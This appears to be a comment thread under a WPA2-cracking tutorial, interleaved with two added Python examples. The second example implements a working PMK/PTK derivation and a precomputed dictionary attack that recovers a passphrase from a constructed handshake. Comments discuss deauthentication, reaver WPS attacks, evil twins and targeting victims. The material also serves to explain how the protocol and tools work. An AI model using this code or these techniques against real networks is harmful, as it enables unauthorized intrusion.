cirujatuc79: "End of pcap capture file, incomplete four-way handshake exchange, try
using a different capture." :( (wifi WPA2)
Kaloqn Donkov: This is silly, there are better ways to do it, not with this fucking
pepin machin: What a freaked up tutorial, waste of my time
Ik Foung Tang: Hi, may I ask: if the password isn't in the wordlist, can it still find the
WPA password successfully?
davidangelmorin: Where can I get the software?
m9alexz: Anyone want to hack WEP? I can teach you how, just send me a message :)
urbex2007: Pointless! This ONLY works *IF* the password is in one of the word lists on
the computer. If you use a random character, mixed case and special
characters, you will never crack WPA2 or even older WPA. Everyone doing
this type of video will lie to get viewers, not one of them knows how to
crack WPA(2). All they do is copy other videos without understanding how
the software works. Show me a proper WPA2 being cracked without the
password already input on the computer! You can't!
Justin Hutchens: In theory you are correct. A dictionary attack is only as good as the
wordlist used. You obviously haven't looked at the darkc0de wordlist
though. That and others that are commonly used these days are not composed
of just a list of lower case words. They include actual passwords from
password dumps, and large amounts of number, case and special character
permutations. Additionally, if you are targeting a victim, you could gen up
a custom wordlist with something like cupp.py
Pr. Nizar: I've seen a technique using honeypots in a video from Hacktivity
(watch?v=Ra0dGPYScLQ, the practical magic begins at 30 min)... This one is a
tricky one and seems to be more reliable than just bruteforcing your way
in... But I presume you have to be near your victim, and the real AP shut
down or farther from the victim than you are... P.S.: Sorry for my poor English;
it's only my third spoken language.
Justin Hutchens: That is correct. A successful dictionary attack requires that the
passphrase be located within the dictionary file used.
TheReelMatt: Thanks for getting back to me so fast. It looks like we are on the same
page, that is pretty much exactly what I was thinking except I ran out of
room to type. I am going to look around the internet and see if I can find
anything on it. I am not a programming genius, however it would seem simple
to append the data, unless it's not as simple as (the first half is the
password / the second half is the SSID). I have a feeling that the IEEE would
be smarter than that. It would take someone smarter than me.
PackOfWyvern: 2. I guess it's worth noting that I got a new router today (NETGEAR N600
DualBand). I did a packet capture of my new router and deauthed my computer
to get EAPOLs. When I tried cowpatty on it, it gave me a message saying
"incomplete 4 way handshake, try a new cap file". I tried about three
different times with different amounts of deauths and waited a good amount
after the deauths, to no avail. I suspect the dualband freaks it up. BTW I'm
using an older eee netbook with BackTrack as the only OS.
Justin Hutchens: You are correct that prehashing takes about the same amount of time. The
advantage of prehashing, over aircrack is that you can perform the hash
computations without being in proximity of the access point (assuming you
know the SSID). Hypothetically, if you wanted to crack an access point but
you didn't want to sit next to it the entire time, you could drastically
reduce the time spent sitting around suspiciously with your laptop by
prehashing. Hope that answers your question.
spankymcnolan1: I don't crack WPA, just the router's PIN. Cracking that takes 1 minute to 10
hours, although it needs PIN authorization enabled. Wordlists just
take too long, even with a GPU, like hashcat.
Dawsonmorph: Best WPA vid I've seen so far, very clear and well put. Well done, Mr. I'm
now off to crack my own network with this cantenna :)
Justin Hutchens: Yeah, you can still do it. The deauth injection just forces the system off
the WAP so that it has to reconnect. If you can't inject deauth packets,
you will have to wait for either the user or system to reconnect on its
own. Given enough time, it'll happen.
Johnson Doe: It is unlikely that a dictionary would contain that specific password, and
so any dictionary-based attack would not work. However, if your router is
susceptible to WPS hacks (which most routers are) you could just use
reaver. Or try the evil twin method.
Mac Sam: The only way to crack it is using reaver and waiting at least 6 hours :(
Blackhole1686: I have a big problem. I use airodump-ng mon0 and it shows me a list of all
available WAPs and some of the clients (not all). But the clients aren't
associated with a BSSID. The probe (ESSID) is shown correctly, but the
client isn't associated. That's why I can't see clients when I look for a
specific BSSID. It only appears there when I aireplay that specific client
with de-auth, but when I reconnect as a client, I don't get the handshake,
because the client then still isn't associated to a BSSID.
lars38010: Are you people hacking your own computers or other computers? -_-
Random: I'm sorry, but I don't really understand how this is different from
aircrack... I mean, it's basically the same thing under a different name. (Both
are dictionary attacks, right?) And making a prehashed file takes the same
amount of time as just attacking directly, right? Could you explain how this
Justin Hutchens: Lot of variables involved there guy. Processing power will have an impact,
but so will the size of the wordlist. And I've never run this on a large
wordlist. There is not much professional demand for wireless pentesting.
These videos (particularly the wireless ones) were just demonstrations of
how the tools work. Even if I had the exact specs of your system and size
of the word list, I'd still just be giving a guess at best. Try it out and
find out. Quit the job if it takes too long.
Justin Hutchens: Thanks for the support Justin. I try to clean up the SPAM at least once a
week. But they keep on coming, lol
Chittu Kudumi: Thanks for sharing your experience. I'm afraid that (pre-hashing)
generating the "pregendump" file consumes the same time as an online attack.
Of course the offline attack is really worthwhile, but is there a way to speed up
Mac Sam: my wordlist passphrase is not in the dictionary so this gives it no hope
Dynamic4ever90: You're fantastic!!!!!!!!!!
Justin Hutchens: I wouldn't say using genpmk and cowpatty is really faster than aircrack.
It's more just a staging technique. If you aren't in range of an access
point that you want to attack, you can start doing the work with genpmk.
Also, try CUPP for generating custom dictionary lists... if the generic
ones aren't proving very successful. I've got a video on it too: "Target
Specific Password Cracking with CUPP".
Matt Shepherd: It's taking 2 days to create the pregendump file. My word list is about 8
gigabytes. How long will this take, anybody?..
Justin Hutchens: Let me know if you find anything interesting. I could write the program,
but I doubt i have the math skills to create two independent functions that
would produce the same key as the single algorithm. It's things like this
that make me want to do a second bachelor's in mathematics.
Justin Wagner: Oi! Get off the rooster you're sitting on and go be an asshole somewhere else.
xbadc0de: what the freak is wrong with your voice? are you crying?
Tsc.ConsultingInc. Mr.: This video is not that clear! You're using BackTrack in a VM.
PackOfWyvern: Thanks! One more thing: what if there aren't any EAPOLs in my capture? Do I
have to scan for longer? I'm trying this on my WPA2 network.
MR.Josh Promjai: Hello brother. I have a big problem: when I run airmon-ng, nothing
shows up. What does it mean? Thank you for your answer!!!
makstukas: yeah he is a noob
Wrong Wahab: Could you please tell me where I can get cowpatty....?
daytona1212: Thank you, this was very helpful!!
PackOfWyvern: ok so after fiddling a little bit with sending deauth packets I noticed
that I could send them without my Alfa card even being plugged in, is this
supposed to happen or is something else going on?
ANAX ARKANGEL: Unless you're going to do it from there...!!! Besides, cracking a WPA or
WPA2 key... has already been practised far too much... why not use cymothoa and
extract it by other methods, since if the key isn't in your dictionary you're
going to have a hard time, or you'll wait thousands of years... unless memristors are born.
Anthony Dacey: Excellent tutorial, although the genpmk took over 16 hours to generate
against my wordlist, which is a little bit bigger than the darkc0de list. In
fact I stopped the process, then ran the crack; cowpatty reported no 4-way
handshake found. Ran the cap file in Wireshark and only found a 3-way handshake.
Ran this through aircrack, took just under 4 minutes. Then imported my genpmk
file into airolib-ng and created a database, ran the crack and it took just 1
second. A nice learning curve. Thanks
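The "incomplete 4 way handshake" messages that PackOfWyvern and Anthony Dacey hit above come down to which EAPOL-Key frames actually made it into the capture. Below is an added example (not code from the video, the tools or any commenter) that classifies EAPOL-Key frames as 4-way handshake messages 1-4 from their Key Information bits and reports whether a pair usable for an offline PSK check survived. The frames are constructed inline, not taken from a real capture; using key-data length and the Secure bit to tell message 2 from message 4, and accepting only M1+M2 or M2+M3 pairs, are simplifying assumptions of this example, and the real tools apply their own extra heuristics.

```python
"""Added example: classify EAPOL-Key frames into 4-way handshake messages and
check whether an offline PSK test is possible. All frames below are CONSTRUCTED."""

KEY_INFO = 5        # offset: 4-byte EAPOL header + 1-byte descriptor type
REPLAY = 9          # offset: ... + 2-byte key info + 2-byte key length
KEY_DATA_LEN = 97   # offset: ... + 8 replay + 32 nonce + 16 IV + 8 RSC + 8 ID + 16 MIC
PAIRWISE, INSTALL, ACK, MIC, SECURE = 0x0008, 0x0040, 0x0080, 0x0100, 0x0200

# Constructed RSN IE advertising CCMP + PSK, as a station would send in message 2
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")


def eapol_key_frame(key_info: int, replay: int, key_data: bytes = b"") -> bytes:
    """Build a constructed EAPOL-Key frame (nonce/IV/RSC/ID/MIC left zero)."""
    body = (b"\x02" + key_info.to_bytes(2, "big") + (16).to_bytes(2, "big")
            + replay.to_bytes(8, "big") + b"\x00" * (32 + 16 + 8 + 8 + 16)
            + len(key_data).to_bytes(2, "big") + key_data)
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v2, type 3 = Key


def classify(frame: bytes):
    """Return 1-4 for a 4-way handshake message, None for anything else."""
    if frame[1] != 3:
        return None                                  # not an EAPOL-Key packet
    info = int.from_bytes(frame[KEY_INFO:KEY_INFO + 2], "big")
    if not info & PAIRWISE:
        return None                                  # group-key handshake message
    has_data = int.from_bytes(frame[KEY_DATA_LEN:KEY_DATA_LEN + 2], "big") > 0
    if info & ACK:                                   # AP -> STA direction
        return 3 if info & MIC else 1                # M1 has no MIC; M3 has MIC (+ Install)
    if info & MIC:                                   # STA -> AP direction
        # Assumption of this example: M2 carries the RSN IE and is sent before the
        # Secure bit is set, M4 carries no key data and has Secure set.
        return 2 if (has_data or not info & SECURE) else 4
    return None


def replay_counter(frame: bytes) -> int:
    return int.from_bytes(frame[REPLAY:REPLAY + 8], "big")


def usable_exchanges(frames):
    """Pairs that allow an offline PSK check: (M1, M2) with equal replay counters,
    or (M2, M3) where M3's counter is M2's + 1. M2 is mandatory here: it is the
    only message carrying the SNonce together with a MIC the PSK can be tested against."""
    by_type = {}
    for f in frames:
        t = classify(f)
        if t:
            by_type.setdefault(t, []).append(replay_counter(f))
    pairs = []
    for r in by_type.get(2, []):
        if r in by_type.get(1, []):
            pairs.append(("M1+M2", r))
        if r + 1 in by_type.get(3, []):
            pairs.append(("M2+M3", r))
    return pairs


# Constructed captures: a full exchange, and a deauth storm where only the AP's
# message 1 frames were heard (the cowpatty "incomplete handshake" situation).
COMPLETE = [eapol_key_frame(0x008A, 1),            # M1: Pairwise | Ack
            eapol_key_frame(0x010A, 1, RSN_IE),    # M2: Pairwise | MIC, carries RSN IE
            eapol_key_frame(0x13CA, 2, b"\x00" * 56),  # M3: Install|Ack|MIC|Secure|EncKeyData
            eapol_key_frame(0x030A, 2)]            # M4: Pairwise | MIC | Secure
ONLY_M1 = [eapol_key_frame(0x008A, 5), eapol_key_frame(0x008A, 6)]
M2_AND_M3 = [eapol_key_frame(0x010A, 7, RSN_IE), eapol_key_frame(0x13CA, 8, b"\x00" * 56)]

if __name__ == "__main__":
    for name, cap in (("complete", COMPLETE), ("only M1", ONLY_M1), ("M2+M3", M2_AND_M3)):
        print(name, [classify(f) for f in cap], usable_exchanges(cap))
```

Run stand-alone, the script shows the full exchange yielding both usable pairs, the deauth-storm capture yielding none (which is what prompts the tools' "try a different capture" message), and a capture that lost message 1 but kept messages 2 and 3 still being usable.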
Justin Wagner: No problem mate. I'm trying to get my CEH certs and stuff and when I see
spam on someone who has a CEH well it irritates me XD saying that the tools
we use are fake and then saying that skidrow is popular....makes me want to
puke in my sleep when I see that ;~;
1kekas: Thanks for the reply... I test handshakes with pyrit and cowpatty, is that OK?
TheReelMatt: Justin, great video and thank you for sharing with the community. I am an
avid user of Aircrack however I am looking to expand my knowledge of
different tools used in defeating WPA2 encryption. I understand that the
hash is based off of the SSID and the PSK however, is there still a way to
generate a prehashed file for an unknown SSID? I am assuming there isn't
however I just wanted to get your input on the matter. Short of using a
GPU, there is no real way of reducing the time it takes. Thanks
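TheReelMatt's question above (is the prehash usable for an unknown SSID?) and Justin's earlier point that genpmk lets you do the slow work away from the access point both follow from how WPA2-PSK derives its keys. Below is an added example, not code from the video, cowpatty/genpmk or any commenter, that walks through it: the PMK comes from PBKDF2-HMAC-SHA1 with the SSID as salt, the PTK from the 802.11i PRF over both MACs and both nonces, and the MIC on message 2 is what a candidate passphrase is checked against. It precomputes a genpmk-style PMK table for a wordlist, then runs the cheap PTK/MIC check against a handshake that is constructed inline (made-up SSID, passphrase, MAC addresses and nonces), and shows that the same table is useless against a capture from a different SSID.

```python
"""Added example: WPA2-PSK PMK/PTK derivation and a genpmk-style precomputed
dictionary attack against a CONSTRUCTED 4-way handshake (no real network)."""
import hashlib
import hmac

MIC_OFFSET = 81   # EAPOL-Key: 4-byte EAPOL hdr + 1 desc type + 2 key info + 2 key len
                  # + 8 replay ctr + 32 nonce + 16 IV + 8 RSC + 8 ID, then the 16-byte MIC


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    The SSID is the salt, which is why a precomputed table is SSID-specific."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: PTK from the PMK, both MAC addresses and both nonces."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2): HMAC-SHA1 over the EAPOL frame with
    the MIC field zeroed, truncated to 16 bytes. KCK = first 16 bytes of the PTK."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, replay: int) -> bytes:
    """Constructed EAPOL-Key message 2 (Pairwise + MIC bits set) with a zero MIC."""
    body = (b"\x02"                        # descriptor type: RSN
            + (0x010A).to_bytes(2, "big")  # key info: version 2 (HMAC-SHA1), Pairwise, MIC
            + (16).to_bytes(2, "big")      # key length
            + replay.to_bytes(8, "big")
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # IV, RSC, ID
            + b"\x00" * 16                 # MIC placeholder
            + (0).to_bytes(2, "big"))      # no key data in this constructed frame
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v2, type Key


def genpmk_table(wordlist, ssid: str) -> dict:
    """genpmk-style precomputation: the slow PBKDF2 work, done before any capture."""
    return {derive_pmk(w, ssid): w for w in wordlist}


def crack_handshake(table: dict, aa, spa, anonce, snonce, frame: bytes):
    """Offline check: for each precomputed PMK derive the PTK and compare the MIC.
    Only the cheap PRF + HMAC step remains once the table exists."""
    for pmk, word in table.items():
        kck = derive_ptk(pmk, aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, frame), frame[MIC_OFFSET:MIC_OFFSET + 16]):
            return word
    return None


# --- constructed "capture" (all values made up for this example) ---
AA = bytes.fromhex("001122334455")    # AP BSSID
SPA = bytes.fromhex("66778899aabb")   # client MAC
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
SSID = "CoffeeShop"
REAL_PSK = "sunshine2012"
WORDLIST = ["password", "letmein", "sunshine2012", "dragon"]


def make_capture() -> bytes:
    """Produce message 2 exactly as a client holding REAL_PSK would MIC it."""
    kck = derive_ptk(derive_pmk(REAL_PSK, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    frame = bytearray(build_msg2(SNONCE, replay=1))
    frame[MIC_OFFSET:MIC_OFFSET + 16] = eapol_mic(kck, bytes(frame))
    return bytes(frame)


if __name__ == "__main__":
    cap = make_capture()
    print("right-SSID table:", crack_handshake(genpmk_table(WORDLIST, SSID),
                                               AA, SPA, ANONCE, SNONCE, cap))
    print("wrong-SSID table:", crack_handshake(genpmk_table(WORDLIST, "linksys"),
                                               AA, SPA, ANONCE, SNONCE, cap))
```

The first lookup recovers the passphrase; the second, built for a different SSID, finds nothing even though the same word is in the list, which is the concrete answer to the unknown-SSID question: without the SSID there is no salt, so there is nothing to precompute. The derive_pmk function can be checked against the IEEE 802.11i test vector (passphrase "password", SSID "IEEE").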
PackOfWyvern: Would you mind shooting me a PM so I can better keep track of your
Ale Xander: How do I find the password for a Wi-Fi network on Windows 7? I don't know
Linux.... The security type is WPA2-PSK.
Zachary Sloan: I got you now. Hey, I also wanted to say that your WPA2 cracking video
helped me in mastering aircrack-ng, at least the part that is important.
If it wasn't for your video I would've never had the patience to learn
BackTrack 5 at all. Thanks a lot man, and looking forward to more videos from
you. Later man.
setniggersfree: I wish I was 20 something again, this is too much to digest. Anyway, thank
you for a great video!
Pr. Nizar: What if your Wi-Fi adapter does not inject (and you're incapable of deauth),
can you still capture handshakes? Or is there any technique to
bruteforce without the handshake?
Mac Sam: Fu is for wpa only
Alex: Meanwhile I'm here at a damn library using their computers :( wish I knew
what he was saying.. Good stuff though..